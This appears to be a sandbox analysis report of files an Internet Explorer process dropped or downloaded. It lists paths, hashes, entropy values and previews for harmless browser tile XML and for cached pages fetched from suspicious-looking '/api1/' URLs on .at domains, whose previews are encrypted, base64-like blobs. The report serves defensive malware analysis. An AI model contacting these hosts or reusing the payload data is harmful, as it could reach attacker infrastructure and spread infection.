SSDEEP:	12:TMHdNMNxiS5uDs5u1nWimI002EtM3MHdNMNxiS5uDs5u1nWimI00OVbd5EtMb:2d6Nx1rmSZHKd6Nx1rmSZ7VJjb
MD5:	B89FF3FBBCB5E47C0E463E911F55C2BB
SHA1:	AF981534A73548F5289F22B7BCBF028E85613109
SHA-256:	3E65FC0F164F45A3A4E3FB574E49111FD8124E847549F784FD0AA2C70B6FB8C1
SHA-512:	9598E4DE275C3DE34B95D4615BF88E58D0DAFB50A7EE5E9AF611A5670C198373DE12E7E2E17BA4738845D0ED650E1D7ABD10802A91AE8AA3114A7C099CFA5A62
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xf130cebc,0x01d70168</date><accdate>0xf130cebc,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xf130cebc,0x01d70168</date><accdate>0xf130cebc,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.108303501342166
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGw7+vuD9+vu1nWimI002EtM3MHdNMNxhGw7+vuD9+vu1nWimI00OVbi:2d6NxQ4LrSZHKd6NxQ4LrSZ7VYKajb
MD5:	C1CEA9ECF23FACAF7D7CDB2B655331C1
SHA1:	0D6E882C06C66ABEC6962A5E1604D691A259320E
SHA-256:	A8F13D23769A47FF32C264F8419A16284640054F540825890196B82881AF2FD3
SHA-512:	BA62DC2ACEF47C91A40D7A3C3E5A615F618F26CBFB64D765A90A75D777454F9A33EB0B72AAB46BC71E8C8AE79A1E40377795650AD95AA62EAC090320C0593945
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xf1333126,0x01d70168</date><accdate>0xf1333126,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xf1333126,0x01d70168</date><accdate>0xf1333126,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.031663450143452
Encrypted:	false
SSDEEP:	12:TMHdNMNx0nS5uDs5u1nWimI002EtM3MHdNMNx0nS5uDs5u1nWimI00OVbxEtMb:2d6Nx0SrmSZHKd6Nx0SrmSZ7Vnb
MD5:	6518BC20E63113959B385809F0D698ED
SHA1:	04C3773DDDE292611FD9EC20718BBB46DCEDD2AB
SHA-256:	4B0CC5FE3B0517F0B488896A8CB3A9533B413BCB8B7CA04F36274A52E089153A
SHA-512:	F108BC5580E127C9B9D6AE0E953524BC085C8946503F0CB0CB65D1396749609B4E03E7BC3828AA2542CB8333029424D0F19110CB76D3475A537016CFC74448C6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xf130cebc,0x01d70168</date><accdate>0xf130cebc,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xf130cebc,0x01d70168</date><accdate>0xf130cebc,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.0679588259813535
Encrypted:	false
SSDEEP:	12:TMHdNMNxxS5uDs5u1nWimI002EtM3MHdNMNxxS5uDs5u1nWimI00OVb6Kq5EtMb:2d6NxgrmSZHKd6NxgrmSZ7Vob
MD5:	A725A2619CB011FE3601D1E8434C8388
SHA1:	8693FB18A31691DED04D911251DC060F5AB3E3CF
SHA-256:	54B6475CA6CBAB19F8757A1D740B8299318AA10F7606214E78900B0FDCD69783
SHA-512:	81890C434A602556B9CD52A390265A5A97DCE3C79A825C6FD974A2C13F279EA755192B9B607C7877B49A6654990B0593E0E38FE1D040A0B9B52FFE4FA224D012
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xf130cebc,0x01d70168</date><accdate>0xf130cebc,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xf130cebc,0x01d70168</date><accdate>0xf130cebc,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.10030687794725
Encrypted:	false
SSDEEP:	12:TMHdNMNxchUuDbUu1nWimI002EtM3MHdNMNxchUuDbUu1nWimI00OVbVEtMb:2d6NxeSZHKd6NxeSZ7VDb
MD5:	37113ED37DF1BA71A0CC8A28801EB527
SHA1:	95A497BFAA822D07DC911557439C8308B3E9A604
SHA-256:	DB6AF2496D8C5AF68C8FE028A3EA7A75D26766633F32DB8FEE1DF5C2B58BF6EC
SHA-512:	E4A27416852AB57BE6A6710DCDD126CE48AE0285EDAFAB3D1FC0A089CE9443287B1BDE5D7055FC5890C5FC7D133798556538FF8E54D3A2D58E4C58CBFA6CAD5B
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xf12e6c79,0x01d70168</date><accdate>0xf12e6c79,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xf12e6c79,0x01d70168</date><accdate>0xf12e6c79,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.081316208094742
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnhUuDbUu1nWimI002EtM3MHdNMNxfnhUuDbUu1nWimI00OVbe5EtMb:2d6NxbSZHKd6NxbSZ7Vijb
MD5:	0F91860BABAEE6825FBAB7D5E5377636
SHA1:	E3728051EA4B99E3367C55C05F700EC521D8A685
SHA-256:	157AC6F2926BC16EEF91AC6E570B1C043D6E915B34BF721FEEC778912ADB2938
SHA-512:	6875CAB37D184DEB7AA544C57056F9CABC7AC64EAD8966C38F450BEDF60563FE2CFBD21297FACAE8DB9FA0D02C1BA735FE2317372E2A4991DC79F55B18CD2860
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xf12e6c79,0x01d70168</date><accdate>0xf12e6c79,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xf12e6c79,0x01d70168</date><accdate>0xf12e6c79,0x01d70168</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\jQf9TsE9[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	268384
Entropy (8bit):	5.9998552910138825
Encrypted:	false
SSDEEP:	6144:zvgA3Qw06J49XASkKoI4jd9AfU5XLHwCiLwX4o0z3D/h:0s+XE9IQrAfU5LniZz31
MD5:	C3CAEF69132E4482786E5D1DEFA54A67
SHA1:	CAE2BDE39818D13B3AE3BD6CDEA831AFE0E84348
SHA-256:	9CED7E9896575CC2D4B2177A3563EB2D782CADC024B0C7E20025D8BF9F95A143
SHA-512:	D049EEA672CDF869B600582764884D773A2F76CDD8319194809AD39EB5E8DA9CB0FCB46741E3E30966D5486054CB8CEFD093ECAC67CA6BC982A6BAB1A3BC328E
Malicious:	false
IE Cache URL:	http://golang.feel500.at/api1/tImL8jZlII9uy/Sa8Z12vW/JG0sDCYv96mnYtDsn1Jnt3e/XYTd0GATXg/XwcDwpCd2vvNyexYh/5IBZNKPDd82e/Sfq1uBktd3t/JAcKip5_2F1iiz/RPTyTdp7IDHiXyZe31kKi/YwPGUHlbAVrZQiJG/SzxK0AoLMu7pJz8/amcTh_2FxtM1YghDIM/RJhzMBJ32/UeEsYhC9E1juxsvgDHu2/XGHdHL4mrBZhgHYHQrE/_2FfBJOhnZDsrt5kghDKCq/x6jFt9w2z9sQ_/2BbtS3lh/ua5XHXz43d5GTeWt38fFqSh/tbGXpr_2B/jQf9TsE9
Preview:	pDmiA1zlYMEzOeQVmwh+ZIAjjkn/EJsypsOjH91+ztyMTvXZNfq/idfnEn8LM/9926r9/XhEHf/pebOVZAa5tJ2hK9GWFAsC3wYOB7+UORyuYVGGzHBH9Yg6/jVslkAvFTUgk1azF7YaZP0+zuKy1uMVJnwDvZd2ZGDXCKLLt6l0BVgNzHOPKVVgYZ2Tl+yZt3zZxYLQMDEdhL+fUwxNDs55XLFWHgoAcFLhjEZ93S/181WQ1LJL0z7Zf6dXPghjWwPnPwEcnlMES0/vxpvvhsjTjd0IqcBWajtGVk8pZ1TAF4DLDmSfHfjkYyXYhhhdPvfZPcxXLgEZJfhgXpqaFVx20LfCJsl1Eby5QZeafaxrcnraO95f3rb8A+aGWMo73+h/QFB1Ovh5IrXbDqxTGhUWQhOkfIV9A3kEGgdDBJihsg+0FuIOfBks/HMTmGetPHdfQB/wg1CCR3/X4NNEDTPh8o8L5FzexI1Zig3Qkynox5DKu2cMB3odcSuuVhiuJJdl8Q3Yk7N00lVX29zAW+fgTDCf8mNt7HtInTWQtbKMersTi+Vv1ulRzQUp07HH3DFTAfbX8YRvw46ta2W4hjV9YtweVdqaHPpCGdSSEO5BGkj5nD/ad67JfFur5BhL+yyec6466bUAmTjfjt708cullACokJktt5hshdcKe6RuiGOzkf1nB4YFQCAZs6gkk77nikVntIFG1ncUatN2CO3EG57XD0tvwjwc7p3LStexU6dlsFXI194yixxb8x/xxAXk7Mnzg7W4NblAVgMw0Pb0UaLUmembqcbBlrTTBaaV+r7NiPSft/Rx/r1kEwOQNVAaoa6QHInaINDws6Ux4R6VNUHBJHELvtpjra++xAOHKAyV/phZu4o/dHjSmMvI2SMZtUp7oVvNQarxyYt/cm+G95snlWF/OqjBqBphJ+7Kx4oxfD33TY9stZLZJwKOs0ey2cYst4IYi6FwYej+mLj0s7n6MXx33aLUvJ6T

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\4Glkh[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	340064
Entropy (8bit):	5.999946387392311
Encrypted:	false
SSDEEP:	6144:9XsKDPaMbJEGhBZzSM21wvjNiYDGcYTnYl7caK2hC+bGegVx6z:3CMCGhfmMm0DGhYl4wCaGeA6z
MD5:	02C69AB327D41C7472A37B69F208257E
SHA1:	15E7E3EE7D9680A66F2003C124B66D74676891E5
SHA-256:	311F62A08C267BB0F7E0D306B645D71B0195326E7124EBE879B4C554F9FD8B84
SHA-512:	4AA81EE3A9A09CEF4915E4A60A40983C39FA563B6141D8B93FB550BB0EC67A063895DF2A2992C86C806D3B981B1506F3F004535E11050BFAB6C6BA7362963A25
Malicious:	false
IE Cache URL:	http://go.in100k.at/api1/6shKz_2BQVnN/OCP1pP4Tyvc/HZOndob_2FtP7a/idZHTuxKtsPI9_2BbDL_2/BF4JwIYV_2B7TAX4/McJ52rW1_2FgARN/40faJ26v_2FkZz1ElZ/d_2BmWnTR/ElzVYUi1oSGpXwpyCzo4/qnIAV1aIx5Bi1e_2B9P/F_2F3VBYsuFw9rFe9x8MBm/BOzSVExVFj_2F/uL_2BJ_2/BhPryJhLkRIvqsfR1DhX_2B/yer6vsREF4/n6YQE_2F_2FK5FDnd/llvOW2cpbliJ/dWtAimwUgXd/EZllvyGgYHINZb/iZ7az3_2FONnJ152lupGR/GoLcwVw9tDIcG6Ji/6Z9JjQwVkidC5aO/Ark1JBZjGu7c/4Glkh
Preview:	/v5345vxgC98xXFr1md57eQwXfktYyBXLlpXhCdSNjB42vymx1Z9p4rsHHIaWYDgZWHmrIMhM59Cj6t4TTs6dKbsYAztZe+v4jR8jVN8y3Wfn2TB0kjP+WR1MFtZnkC4NJZNb0DxjUGTLi2ITD00TH//LybxlZePrDn9l+HiRro9sNFhoXU8KCzlC1TlhITDIB4UemCPD//uM6mL2ya4RheF/ImP/Xx/uMDc9SWGZnxcTGwhZPUta0nQe8BM4S836/sY7GMVhMPs6dNq0xAF46InI0prnfpv7Gx2ABegKhOBKadpnvfYh2P24btt5W6rUxOq7ra/Ge+d0Z9kNddnHr+mIoDnkAUMOrcllVuuYgYZq8Rr6UM7DZWq7C4m5kziRrTRM8Md5AZYVtLLnfRfdkEfV4veMK3pVACahcDaHfRultceJZrS89VRaSrA7X4xTbHo2HqQQSgvx11Nh2gXoDHhq6bSxA8+7Bef+KjmRWR07Wv9wNL5d+141ijCYagMOH2yIz6DeWp8fhA2Gcwl0vlIkg+pfwJ4ol8q8i0ulgGvWAl55u7AmCESCDqBjGDqwrfVsKZjksoKe6pTwBJRBxgkpQ7SJ7p0XiDIqYPED0gOxLvbtF35lMp6Kfjwap43sywfve87d/gP21up5if8cSmI36CGxRlXRKRIJz6xJspHxGffVm3VQ7UoRNrHLAj+gdVRpuBB9waSO4u6eCOvTk7czRFGLDf5aun6TiMj7WQ9i1FXnXpUM2uPh/+s/TPA/m4z7NuTaytRjZZ/SA/AuxfDNWn936LKFW0M782l/nwvWrn9ml3+scKWZd5z7qIINn34luhBSQYvc8g2TpGUKK6bxGyV9gI2n2+SdmTLq7nWX27/uWO4KzE60nP8aeDfChQG5+cXhzDG9mhSxvU4WSzTlK11+Ah8JItrtt/qnGjSveOLT0+GvLbHtkx0l0CntcbsZoObAOET/em6hORmzJ4byejmMEOACqRlj880

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VeCW9pRE[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2436
Entropy (8bit):	5.983199215689233
Encrypted:	false
SSDEEP:	48:7UEA+tiKUVl/A6TIOBkfaSW3gfSZwLhOcCU5MLXQMvmV4upRK0KF5+0yr:kuWBJIOBkSXQfSZwLQZUqDQMvnufK0oQ
MD5:	6FE3494F7B065482245A2A6C204DCD3F
SHA1:	ABC9020C21FCEA339859E454AC409B4C889A7A5E
SHA-256:	BB0C10B56A024FF4FEE7E7570FCF1F09F8E66A6415BAC1681C9323A78872A83B
SHA-512:	D8B3DA910D333CA2E6C60C486369E95DF7F0E743CF46DF32BF6927063E6FB3F90FC5AE8EC47F5E1C151BE9253D24CD355118D5B641DE4045637E4F876DFBCA90
Malicious:	false
IE Cache URL:	http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE
Preview:	b+YH+ZryB5qZVR6Aki7JDaLZVW49s0mX6rFFKJuHR1MOcIXlEVk0iTDW1yhwFPDifwW0iutGk9ue9BbvjL4pQ+Bg1e9sPpgnNaJA5qKMkUyeIW1SiEjKR8eMENUAXXyxCI1f1P//rYz+MNf8/+f9I+YI6onkuvkYMypo9RVjjMK1iHYP6uDP139zi8WOZgIQQMxX2/98qRQrY5OFm/GTaoC4Mu1bsF9W/ObLngsKaNJatOGPz9i51T7H+0ICSoxXN6Hy4n+Q+CUk34dLNZ895F1ScqfrC5K3ZnYvl4KIul8JBEEM9T9SPQxzbNeRq1yITIpwxS/FpTEiUwbnVSlMtBkpvP/tFU7LhllQSHaKSAdz/KzZls9xRvp5SA4QFDmAw0H6rhSHEcoOi2lBfZSPx9hOZSDicX78Ca4916DPfL8opLlwS6KcqjK6uCJCsfyVeCiuh7Pt+hH7xQpdBfN8QoRxYodTamGdgJjF74+DoJs1nk/uZ1kBecEmJsdwYvy3gNrYIrvuwL17U9N//xDGq3xzmRHzmV4X3lObgXJlCnCIrPzQS3PtwOPBPCB6Jr9JEf+B8tWe9PchrYEbvet5Wf6DcANZExsl3ZL1TCD3l76TTPIbga5EFzCUeAr+SMxZSKHgS/FMMg3sDs0nrEB/DMKYB/KzBoIOiY4lQeooPUSqeBXl2OlznRhG8twiXSPhVGJRw+9Wbuh8Zi/Rb9KZtyG5PNDihlnQ4hwvrY1nf7WAACOC9OMC8Q4xaEOGmER0YKXRwI4c2F/7xBDl8BBQw82GsDQM5cW48IcGNjquebzHclVQFbInr/D6EldUhxWvpVeWmBw71AssycFpLZR1EDI9QbAjKzvMGM1dp8a6zxl/mlbfr8XRLD8gt904aba6SPQ47uVvwvKdTJXEvWtmDWSQMa9NdDftNRjwJYeq8w9LIMm5cH0Vx87/EAvdOrRfVzjP8ByDqTNAxtWjEZbA0mZ1YrRGyOWbEJMt+vQ+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\GbYUyI[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2436
Entropy (8bit):	5.983199215689233
Encrypted:	false
SSDEEP:	48:7UEA+tiKUVl/A6TIOBkfaSW3gfSZwLhOcCU5MLXQMvmV4upRK0KF5+0yr:kuWBJIOBkSXQfSZwLQZUqDQMvnufK0oQ
MD5:	6FE3494F7B065482245A2A6C204DCD3F
SHA1:	ABC9020C21FCEA339859E454AC409B4C889A7A5E
SHA-256:	BB0C10B56A024FF4FEE7E7570FCF1F09F8E66A6415BAC1681C9323A78872A83B
SHA-512:	D8B3DA910D333CA2E6C60C486369E95DF7F0E743CF46DF32BF6927063E6FB3F90FC5AE8EC47F5E1C151BE9253D24CD355118D5B641DE4045637E4F876DFBCA90
Malicious:	false
IE Cache URL:	http://go.in100k.at/api1/WpBs3eblZL2bM/eqngm5Qw/I8JSfPJ_2Fa8Gc3pObm8uim/9flcMVIzEU/MRqomoxt8Q2O1JJ03/ZSj1o2HmPZtK/O9QP218enUp/m1K_2FgloiW3rF/oEuojNadbJqe6VOrFglrs/Ndi7e_2Br7N9yDeG/5hb81boaOqEuw3E/kxHEh7CU8L_2FQm9GN/dbnlxd_2B/J8a13_2FHiOHS5rUu68O/mOTX7eo0S_2BSz_2F55/SPIJ116DNn5HQ6QSsDbLuG/U7BuZ1ELETSnp/HKm0Yev_/2BYuFboTfZStfkhwMh7_2Fr/vWxqAs_2B4/ppPPRk2wwNFmF70Ei/cPOuG4TRxPLy6vkSp/GbYUyI
Preview:	b+YH+ZryB5qZVR6Aki7JDaLZVW49s0mX6rFFKJuHR1MOcIXlEVk0iTDW1yhwFPDifwW0iutGk9ue9BbvjL4pQ+Bg1e9sPpgnNaJA5qKMkUyeIW1SiEjKR8eMENUAXXyxCI1f1P//rYz+MNf8/+f9I+YI6onkuvkYMypo9RVjjMK1iHYP6uDP139zi8WOZgIQQMxX2/98qRQrY5OFm/GTaoC4Mu1bsF9W/ObLngsKaNJatOGPz9i51T7H+0ICSoxXN6Hy4n+Q+CUk34dLNZ895F1ScqfrC5K3ZnYvl4KIul8JBEEM9T9SPQxzbNeRq1yITIpwxS/FpTEiUwbnVSlMtBkpvP/tFU7LhllQSHaKSAdz/KzZls9xRvp5SA4QFDmAw0H6rhSHEcoOi2lBfZSPx9hOZSDicX78Ca4916DPfL8opLlwS6KcqjK6uCJCsfyVeCiuh7Pt+hH7xQpdBfN8QoRxYodTamGdgJjF74+DoJs1nk/uZ1kBecEmJsdwYvy3gNrYIrvuwL17U9N//xDGq3xzmRHzmV4X3lObgXJlCnCIrPzQS3PtwOPBPCB6Jr9JEf+B8tWe9PchrYEbvet5Wf6DcANZExsl3ZL1TCD3l76TTPIbga5EFzCUeAr+SMxZSKHgS/FMMg3sDs0nrEB/DMKYB/KzBoIOiY4lQeooPUSqeBXl2OlznRhG8twiXSPhVGJRw+9Wbuh8Zi/Rb9KZtyG5PNDihlnQ4hwvrY1nf7WAACOC9OMC8Q4xaEOGmER0YKXRwI4c2F/7xBDl8BBQw82GsDQM5cW48IcGNjquebzHclVQFbInr/D6EldUhxWvpVeWmBw71AssycFpLZR1EDI9QbAjKzvMGM1dp8a6zxl/mlbfr8XRLD8gt904aba6SPQ47uVvwvKdTJXEvWtmDWSQMa9NdDftNRjwJYeq8w9LIMm5cH0Vx87/EAvdOrRfVzjP8ByDqTNAxtWjEZbA0mZ1YrRGyOWbEJMt+vQ+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2Rm26[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	268384
Entropy (8bit):	5.9998552910138825
Encrypted:	false
SSDEEP:	6144:zvgA3Qw06J49XASkKoI4jd9AfU5XLHwCiLwX4o0z3D/h:0s+XE9IQrAfU5LniZz31
MD5:	C3CAEF69132E4482786E5D1DEFA54A67
SHA1:	CAE2BDE39818D13B3AE3BD6CDEA831AFE0E84348
SHA-256:	9CED7E9896575CC2D4B2177A3563EB2D782CADC024B0C7E20025D8BF9F95A143
SHA-512:	D049EEA672CDF869B600582764884D773A2F76CDD8319194809AD39EB5E8DA9CB0FCB46741E3E30966D5486054CB8CEFD093ECAC67CA6BC982A6BAB1A3BC328E
Malicious:	false
IE Cache URL:	http://api10.laptok.at/api1/qYtT2W6uUWYJe_2BzG0bJ6/f78jap2G9vTVk/IGsP0y4o/fylIZ_2BQ_2FE0eKcgRyOZV/bwC_2FjfVv/DbtDrQABR9ML9yi1I/a0_2FluH0sU4/80C1scx2jQi/Sm75TjK2Hru6lN/LiAEhJ6pLxTSd4lLSPDNE/hnQ63sbU9X_2Fzoj/gMi3emWWJ488JmV/OalYx6aLrHAsj_2FD5/gwLYQsfyc/LLUkPczTLA0_2B21Yg9i/Zuc0lw0nukK632v8MOb/hMd02siaNyV1doJYj48PSY/dhZQ85SXuAqzk/d_2FIgou/B6fGbyYsoLl0lNh77c_2Blt/2Rm26
Preview:	pDmiA1zlYMEzOeQVmwh+ZIAjjkn/EJsypsOjH91+ztyMTvXZNfq/idfnEn8LM/9926r9/XhEHf/pebOVZAa5tJ2hK9GWFAsC3wYOB7+UORyuYVGGzHBH9Yg6/jVslkAvFTUgk1azF7YaZP0+zuKy1uMVJnwDvZd2ZGDXCKLLt6l0BVgNzHOPKVVgYZ2Tl+yZt3zZxYLQMDEdhL+fUwxNDs55XLFWHgoAcFLhjEZ93S/181WQ1LJL0z7Zf6dXPghjWwPnPwEcnlMES0/vxpvvhsjTjd0IqcBWajtGVk8pZ1TAF4DLDmSfHfjkYyXYhhhdPvfZPcxXLgEZJfhgXpqaFVx20LfCJsl1Eby5QZeafaxrcnraO95f3rb8A+aGWMo73+h/QFB1Ovh5IrXbDqxTGhUWQhOkfIV9A3kEGgdDBJihsg+0FuIOfBks/HMTmGetPHdfQB/wg1CCR3/X4NNEDTPh8o8L5FzexI1Zig3Qkynox5DKu2cMB3odcSuuVhiuJJdl8Q3Yk7N00lVX29zAW+fgTDCf8mNt7HtInTWQtbKMersTi+Vv1ulRzQUp07HH3DFTAfbX8YRvw46ta2W4hjV9YtweVdqaHPpCGdSSEO5BGkj5nD/ad67JfFur5BhL+yyec6466bUAmTjfjt708cullACokJktt5hshdcKe6RuiGOzkf1nB4YFQCAZs6gkk77nikVntIFG1ncUatN2CO3EG57XD0tvwjwc7p3LStexU6dlsFXI194yixxb8x/xxAXk7Mnzg7W4NblAVgMw0Pb0UaLUmembqcbBlrTTBaaV+r7NiPSft/Rx/r1kEwOQNVAaoa6QHInaINDws6Ux4R6VNUHBJHELvtpjra++xAOHKAyV/phZu4o/dHjSmMvI2SMZtUp7oVvNQarxyYt/cm+G95snlWF/OqjBqBphJ+7Kx4oxfD33TY9stZLZJwKOs0ey2cYst4IYi6FwYej+mLj0s7n6MXx33aLUvJ6T

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\yM8_2B0[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	340064
Entropy (8bit):	5.999946387392311
Encrypted:	false
SSDEEP:	6144:9XsKDPaMbJEGhBZzSM21wvjNiYDGcYTnYl7caK2hC+bGegVx6z:3CMCGhfmMm0DGhYl4wCaGeA6z
MD5:	02C69AB327D41C7472A37B69F208257E
SHA1:	15E7E3EE7D9680A66F2003C124B66D74676891E5
SHA-256:	311F62A08C267BB0F7E0D306B645D71B0195326E7124EBE879B4C554F9FD8B84
SHA-512:	4AA81EE3A9A09CEF4915E4A60A40983C39FA563B6141D8B93FB550BB0EC67A063895DF2A2992C86C806D3B981B1506F3F004535E11050BFAB6C6BA7362963A25
Malicious:	false
IE Cache URL:	http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0
Preview:	/v5345vxgC98xXFr1md57eQwXfktYyBXLlpXhCdSNjB42vymx1Z9p4rsHHIaWYDgZWHmrIMhM59Cj6t4TTs6dKbsYAztZe+v4jR8jVN8y3Wfn2TB0kjP+WR1MFtZnkC4NJZNb0DxjUGTLi2ITD00TH//LybxlZePrDn9l+HiRro9sNFhoXU8KCzlC1TlhITDIB4UemCPD//uM6mL2ya4RheF/ImP/Xx/uMDc9SWGZnxcTGwhZPUta0nQe8BM4S836/sY7GMVhMPs6dNq0xAF46InI0prnfpv7Gx2ABegKhOBKadpnvfYh2P24btt5W6rUxOq7ra/Ge+d0Z9kNddnHr+mIoDnkAUMOrcllVuuYgYZq8Rr6UM7DZWq7C4m5kziRrTRM8Md5AZYVtLLnfRfdkEfV4veMK3pVACahcDaHfRultceJZrS89VRaSrA7X4xTbHo2HqQQSgvx11Nh2gXoDHhq6bSxA8+7Bef+KjmRWR07Wv9wNL5d+141ijCYagMOH2yIz6DeWp8fhA2Gcwl0vlIkg+pfwJ4ol8q8i0ulgGvWAl55u7AmCESCDqBjGDqwrfVsKZjksoKe6pTwBJRBxgkpQ7SJ7p0XiDIqYPED0gOxLvbtF35lMp6Kfjwap43sywfve87d/gP21up5if8cSmI36CGxRlXRKRIJz6xJspHxGffVm3VQ7UoRNrHLAj+gdVRpuBB9waSO4u6eCOvTk7czRFGLDf5